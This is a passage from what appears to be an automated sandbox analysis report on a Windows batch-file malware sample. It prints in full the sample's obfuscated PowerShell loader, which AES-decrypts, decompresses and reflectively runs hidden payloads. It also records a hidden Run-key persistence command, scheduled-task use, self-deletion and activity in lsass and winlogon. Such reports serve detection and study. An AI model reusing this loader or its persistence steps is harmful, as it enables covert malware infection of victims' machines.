'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Code function: 21_2_000001F1197D1E3C LoadLibraryA,GetProcAddress,SleepEx,

21_2_000001F1197D1E3C

Source: C:\Windows\System32\cmd.exe	Code function: 21_3_000001F1197AA7DD push rcx; retf 003Fh	21_3_000001F1197AA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 22_3_00000166BBF8A7DD push rcx; retf 003Fh	22_3_00000166BBF8A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC7E6DBC pushad ; iretd	34_2_00007FFAAC7E6DBD
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_00000279A925A7DD push rcx; retf 003Fh	37_3_00000279A925A7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_000001CA7D1CA7DD push rcx; retf 003Fh	38_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_0000017D2DD3A7DD push rcx; retf 003Fh	39_3_0000017D2DD3A7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\q5n7wopk8j.bat

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $cnt-stager

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
